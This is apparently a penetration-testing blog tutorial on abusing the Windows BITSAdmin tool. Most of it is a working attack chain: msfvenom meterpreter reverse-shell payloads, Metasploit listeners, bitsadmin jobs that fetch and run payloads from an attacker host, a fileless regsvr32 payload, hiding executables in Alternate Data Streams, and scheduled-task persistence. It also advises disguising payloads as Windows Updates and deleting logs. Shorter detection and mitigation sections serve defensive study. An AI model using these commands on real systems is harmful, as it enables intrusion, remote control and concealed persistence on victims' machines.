Categories

Archives

Red Teaming

Windows for Pentester: BITSAdmin

In this article, we are going to describe the utility of the BITSAdmin tool and how vital it is in Windows Penetration Testing.

TL; DR

BITSAdmin is a tool preinstalled on Windows OS that can be used to download malicious files. It is one of the Living Off Land (LOL) Binaries.

Disclaimer

The main objective of publishing the series of “Windows for Pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any Pentester while solving CTF challenges or OSCP labs which are based on Windows Operating System. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

  • Introduction
    • What is BITSAdmin?
  • Configurations used in Practical
  • Working with BITSAdmin
    • Downloading using /transfer Switch
    • Downloading using /addfile Switch
    • Downloading using PowerShell Cmdlet
    • Downloading using One-liner
  • Penetration Testing using BITSAdmin
    • Compromising using Malicious Executable
    • Compromising using File-Less Payload
    • Compromising with Malicious Executable inside ADS
  • Persistence using BITSAdmin
  • Detection
    • SC Query
    • QMGR Database
    • Verbose Switch
    • Event Logs
  • Mitigation
  • Conclusion

Introduction

What is BITSAdmin?

Background Intelligent Transfer Service Admin is a command-line tool that creates downloads or uploads jobs and monitors their progress. BITSAdmin was released with the Windows XP. At that time, it used the IBackgroundCopyJob as its interface. The Upload option of the BITSAdmin was introduced with the release of Windows Server 2003. With the release of Windows Vista, we had some more additional features like Custom HTTP headers, Certificate-based client authentication, IPv6 support. Subsequent year was the release of the Windows Server 2008, it introduced the File Transfer Notification Method (which we use it to run an executable in Practical #5). Windows 7 introduced Branch Cache Method for the BITS Transfer. When BITS downloads a file, the actual download is done behind the svchost.exe service. BITSAdmin is used to download files from or upload files to HTTP web servers and SMB file shares. It takes the cost of the transfer into account, as well as the network usage so that the user’s foreground work is not influenced. BITS has the ability to handle network interruptions, pausing and automatically resuming transfers, even after a reboot.

Configurations used in Practical

Attacker:

  • OS: Kali Linux 2019.4
  • IP: 192.168.1.13

Target:

  • OS: Windows 10 (Build 18363)
  • IP: 192.168.1.11

Working with BITSAdmin

As we discussed in the introduction that BITSAdmin is used as a download client. Now we will see the BITSAdmin in action. There are 2 switches to download a file in BITSAdmin, first one is ‘/transfer’ and ‘/addfile’. The working of both these parameters is quite identical. But the way these switches present the progress and completion feedback is different. BITSAdmin downloads files in the form of jobs. A job has to be defined before moving forward. After downloading we can work on the jobs using the various switches.

Practical #1: Downloading using /transfer Switch

The /transfer switch is a short and quick way to download any file from the remote server to the Host Machine. To begin the transfer, we need to define the Display Name of the transfer. It can be anything the user wishes.

Here, we named all our transfers as “hackingarticles”. Now after defining the name, we need to enter the location with the name of the file from the remote server. For the Test Environment, we have a sample image file named ignite.png at the remote server. We mention it and we also mention the Local Location and Name of the file. After providing all this information we hit Enter key and the transfer begins.

bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png

We can see that we can see the State as Transferred and we also get a confirmation “Transfer complete”. We perform a directory Listing to check the file and we are assured that the file was indeed transferred successfully.

Practical #2: Copying Files Locally

BITSAdmin works on the principle of File Transfer. Hence, we can also use it as a glorified copy and paste command. This means that BITSAdmin will also be able to transfer from one location to another on the same machine. Let’s give it a try.

As we already know that the BITSAdmin deals with jobs. So, we will first declare a job. We named it hackingarticles.

bitsadmin /create hackingarticles

The file that is supposed to be transferred should be added to the job. We use the /addfile switch to complete this task. We will be transferring the file.txt from “C:\” to “C:\Users\Victim\Desktop\”.

bitsadmin /addfile hackingarticles c:\file.txt C:\Users\Victim\Desktop\file.txt

Now to initiate the transfer we will be using the /resume switch. This will sound different but the /resume switch does, in fact, initiate the transfer.

bitsadmin /resume hackingarticles

Now, when the transfer initiated. It transfers the file in the form of a temporary file. To actually get the file fully we will need to run the /complete switch. And as we can see that file is successfully transferred to the Destination.

bitsadmin /complete hackingarticles

We can see that the intended file is successfully downloaded on the Target System.

Get-ChildItem -Path C:\Users\Victim\Desktop

Practical #3: Downloading using PowerShell Cmdlet

The practicals that we showed just now can be performed on Windows Command Prompt (cmd.exe) as well. With the release of the Windows Server 2016, Microsoft has released a cmdlet specifically for the PowerShell to manage the BITS Jobs using BITSAdmin Client. It is named as Start-BITSTransfer.

Start-BitsTransfer -Source http://192.168.1.13/ignite.png -Destination C:\ignite.png

For the transfer using this cmdlet, we don’t have to mention the name of the Job. We can just define the Source and Destination as shown in the image given below.

Note: If while penetration testing, we get an environment that is strictly PowerShell and we are not able to use the BITSAdmin normally, we can use this method.

Practical #4: Downloading using One-liner

We can transfer our files using BITSAdmin in one execution. This is a good example when we are in a hurry for a transfer. Instead of declaring the job, add the file to the job, resuming the job and complete the job in different steps we can complete all the steps required to transfer in this one-liner. This method gets the work done in one go. This can also be used to push in a location where we can execute a single instance of command.

bitsadmin /create hackingarticles | bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png | bitsadmin /resume hackingarticles | bitsadmin /complete hackingarticles
ls

Penetration Testing using BITSAdmin

BITSAdmin can perform many more functions (like upload files, etc.) but we will be focusing on Penetration Testing for now.

Practical #5: Compromising using Malicious Executable

It’s time to move on from utility to Penetration Testing. We will be getting a meterpreter session using a payload which will be downloaded and executed using the BITSAdmin. These practical were tested in a lab-controlled environment where we have the same network configuration for the entirety of the Practical. So, we created the payload once and used it multiple times.

To begin the exploitation, we decided to create a payload using the msfvenom tool. We use the reverse_tcp payload with the target to be Windows System and gaining meterpreter. We defined the Lhost for the IP Address for the Attacker Machine followed by the subsequent Lport on which we will be receiving the session from the target machine. We created this payload in the form of an executable and sent this payload to the /var/www/html/ directory.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe > /var/www/html/payload.exe

After the payload creation, we start the apache2 service so that the payload is available to download on the Local Network.

service apache2 restart

After serving the payload on the web server, we will run the listener which can capture the meterpreter session when it will get generated.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run

We set the proper configuration of the payload. We set the attacker machine’s IP address as the localhost address and the port that we mentioned while creating the payload as a local port.

In our previous practices, we downloaded a file, now we will download the payload using the same technique. But as BITSAdmin can also execute the payload by itself we will define parameters for it.

bitsadmin /create hackingarticles

Starting with creating a job named “hackingarticles”, then we add the payload file in the job that we just created.

bitsadmin /addfile hackingarticles http://192.168.1.13/payload.exe C:\payload.exe

After adding the file, we use the /SetNotifyCmdLine switch to execute the payload. This is done with the help of an action that we scripted. First, it will start the cmd.exe and then, it will complete the download and then it will execute the said command in the background.

bitsadmin /SetNotifyCmdLine hackingarticles cmd.exe "/c bitsadmin.exe /complete hackingarticles | start /B C:\payload.exe"

After this, we run the /resume switch to get the download started.

bitsadmin /resume hackingarticles

After the download completes, it executes the payload and we have ourselves a meterpreter session.

sysinfo

Practical #6: Compromising using File-Less Payload

In the previous practical, we created a payload file and then gained a session from it. This method creates a file that can be detected. In other words, it was traceable. But as BITSAdmin can execute a command directly we can exploit the target without using a file.

We will start this practice with our attacker machine, we will be running Metasploit Framework. After opening it we will use the web_delivery Exploit as shown in the image given below.

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp

Here we choose the target 3 (Regsvr32) as it will generate a small command that can be executed to get the meterpreter session.

set target 3

We set the attacker machine’s IP Address as localhost address and we run it. It works for a bit and gives us the regsvr32 command that will give us access to the target machine.

set lhost 192.168.1.13
run

On the Target Machine, there is a holdup. BITSAdmin is programmed to run the command only on completion of the download. So, we will be needing to download something. It can be anything that seems harmful. As BITSAdmin is designed to download the Windows Updates, we can use its file as well. Here we will be using a harmless png image file.

bitsadmin /create hackingarticles
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png

After adding the file, we will move on the /SetNotifyCmdLine. Here we will modify the command that was created using web_delivery in such a way that regsvr32.exe creates the session from the target machine to attacker machine.

bitsadmin /SetNotifyCmdLine hackingarticles regsvr32.exe "/s /n /u /i:http://192.168.1.13:8080/dE8vICrV.sct scrobj.dll"

Finally, we resume the BITSAdmin to get this working.

bitsadmin /resume hackingarticles

As shown in the screenshot given below, we grab a meterpreter session from the Target Machine as soon as the command gets executed.

sessions 1
sysinfo

This was a stealthy method as there is no file associated with the session we obtained. But this can get stealthier using the right techniques.

Practical #7: Compromising with Malicious Executable inside ADS

In the previous article of this series, we introduced Alternative Data Stream. So, without going into details about the Alternative Data Stream, let’s compromise the target machine with a payload concealed in the Alternative Data Steam.

We will create a malicious executable payload using msfvenom as we did in Practical #5, as it is the same method, we are not showing it again here.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe > /var/www/html/payload.exe
service apache2 restart

After creating the payload and starting the listener, we will move to our target machine.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run

Here, we created a BITS job named hackingarticles using the /create switch.

bitsadmin /create hackingarticles

After creating the job, we will add the file to download using BITSAdmin’s /addfile switch.

bitsadmin /addfile hackingarticles http://192.168.1.13/payload.exe C:\payload.exe

After adding the payload successfully, we use the next switch /SetNotifyCmdLine to read the contents of the payload which will be downloaded and transfer to the alternative data stream of a file.txt.

bitsadmin /SetNotifyCmdLine hackingarticles cmd.exe "/c type C:\paylaod.exe > C:\file.txt:payload.exe"

Keeping this configuration, we start the download using the /resume switch.

bitsadmin /resume hackingarticles

Here, we list the C:\file.txt contents to find that out payload.exe has successfully being transferred into the ADS of this file.

Get-item -Path C:\file -stream *

Now to execute the file that we put in the ADS; we will be using wmic. We will use the create switch followed by the path of the payload as shown in the image.

wmic process call create "c:\file.txt:payload.exe"

It says that the Execution was successful.

We went back to our Attacker Machine to see that a meterpreter instance is generated and captured by our listener. We run sysinfo to see the details of the Target System.

sysinfo

Practical #8: Persistence using BITSAdmin

Persistence, it means that the exploited session will be available to you even after the target machine restarts. Let’s see how to achieve this using BITSAdmin.

We will create a malicious executable payload using msfvenom as we did in Practical #5, as it is the same method, we are not showing it again here.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe > /var/www/html/payload.exe
service apache2 restart

After creating the payload and starting the listener, we will move to our target machine.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run

Here, we created a BITS job named hackingarticles using the /create switch.

bitsadmin /create hackingarticles

After creating the job, we will add the file to download using BITSAdmin’s /addfile switch.

bitsadmin /addfile hackingarticles http://192.168.1.13/payload.exe C:\payload.exe

After adding the payload successfully, we use the next switch /SetNotifyCmdLine to execute the payload. This is done with the help of an action that we scripted. First, it will start the cmd.exe and then it will complete the download and then it will execute the said command in the background.

bitsadmin /SetNotifyCmdLine hackingarticles cmd.exe "/c bitsadmin.exe /complete hackingarticles | start /B C:\payload.exe"

After this, we use another switch /SetMinRetryDelay. It is used to set the minimum length of time, in seconds, that BITS wait after facing a transient error before trying to transfer the file. Here, if payload that we download gets stuck in a transient error, which is a temporary error. BITS is designed to run continuously if an error of such kind occurs. So, if our download is completed but due to the transient error was not able to execute properly, this switch will make it retry after 120 seconds.

bitsadmin /SetMinRetryDelay hackingarticles 120

That’s was simply setting up an exploit to gain a session. Now we need to work on it to be a persistence method.  But the BITS can get into an error state and keep the payload in a temporary state without completing the download and in turn stopping the execution of the payload. To solve this issue, we will use schtasks to resume our job at a specific time again and again. This will allow the payload to persist irrespective of any kind of issue.

schtasks /create /tn hackingarticles /tr "C:\system32\bitsadmin.exe /resume hackingarticles" /sc minute /mo 60

The /resume switch in the schtasks will restart the BITS job when if, it enters an error state. Using a schedule modifier task (/mo) to make the task gets reactivated every (60, in this case) minute. The BITSAdmin redownloads the payload in case of an error and schtasks take care of the execution of the payload on an event of a reboot of the machine.

schtasks /run /tn hackingarticles

We went back to our Attacker Machine to see that a meterpreter instance is generated and captured by our listener. We run sysinfo to see the details of the Target System. In case of failure, we will have to restart the listener with the same configuration and we will have the session again in no time.

sysinfo

Please, note this is a limited demo. In the real-life scenarios, we suggest that rename the payload file to look like a Windows Update and perform all these tasks in the ‘%Temp%’ directory for obvious reasons. We also recommend that we modify the schtasks to delete the task after a particular time with removing the presence by deleting the logs related to this intrusion.

Detection     

Before the official introduction of BITSAdmin in the Windows Defender Real-time Scan, it was quite difficult to detect BITS Transfers. Apart from scanning through logs, there wasn’t any other method. Monitoring the logs for the usage of the BITSAdmin tool (especially the ‘Transfer’, ‘Create’, ‘AddFile’, ‘SetNotifyFlags’, ‘SetNotifyCmdLine’, ‘SetMinRetryDelay’, ‘SetCustomHeaders’, and ‘Resume’ switches) Actually, there is a way to gain the information about the transfers. It is through the QMGR Database.

SC Query

BITSAdmin is deployed as a service. Hence its status can be checked with the SC Query Utility.

sc query bits

This will show if there is an instance of any BITS Transfer Running or not.

QMGR Database

It is an abbreviated form of the Queue Manager Database. This is a record of all the BITS Jobs. There are 2 types of files generated in this database record. A .dat file and a .db file. This database file can be found at this location

C:\ProgramData\Microsoft\Network\Downloader\

We traversed to the said location using the dir command to find ourselves a qmgr.db file. We tried opening the file but it was hex-encoded.

So, we used a Hex-Editor Online tool. Here we scanned through the data and found that we have the IP Address of the file being Downloaded with its path. We followed the complete path and it gives us the temporary file that was downloaded before the /complete switch was used.

It is to be noted that the BITS Jobs will not be shown in autoruns as there is not any way to run BITSAdmin on start-up with Default Configurations.

Verbose Switch

If we are lucky enough to find the BITSAdmin in the act, we can get our hands some very useful information. We ran a BITS Job and ran the following command to gain information about the job.

bitsadmin /info hackingarticles /verbose

Event Logs

We have the Windows Event logs which Focuses on the default event logs, it is one of the sources for detection of any download. It is known as the Microsoft-Windows-BITS-Client/Operational log. These logs contain the download state, download source, user and some file information for each BITS transfer job. This event log is strikingly similar across Windows 7 through 10 so it is a good endpoint collection source. There are some limitations here as these logs don’t show the sparse data, as well as the logs, are spread over several EventIDs. Potentially a huge amount of entries in any environment makes it impossible to spot malicious download hiding in plain sight. This log will also not detect the BITS persistence unless there was a network transfer to a suspicious domain as part of the configured job.

This Log can be monitored on the Event Viewer at this Location:

Application and Services Logs > Microsoft > Windows > BITS-Client

Mitigation

Our recommendation for mitigating BITSAdmin is to modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic. We can also reduce the default BITS job lifetime in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS The default maximum lifetime for a BITS job is 90 days, but that can be modified. Lastly, we can limit the access of the BITSAdmin interface to specific users or groups.

Conclusion

This kind of attack is very much happening in real life. There have been multiple incidents targeted to different office environments where the malicious file was detected and deleted but was revived again using BITSAdmin. A special shout out to Oddvar Moe for his help in some tinkering. It was a fun learning experience working with BITSAdmin. We are going to write more articles about other LOLS that we could find. Stay Tuned.

BITSAdmin Operations                   Persistence using BITS    

Living Off Land binaries                  BITSAdmin

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn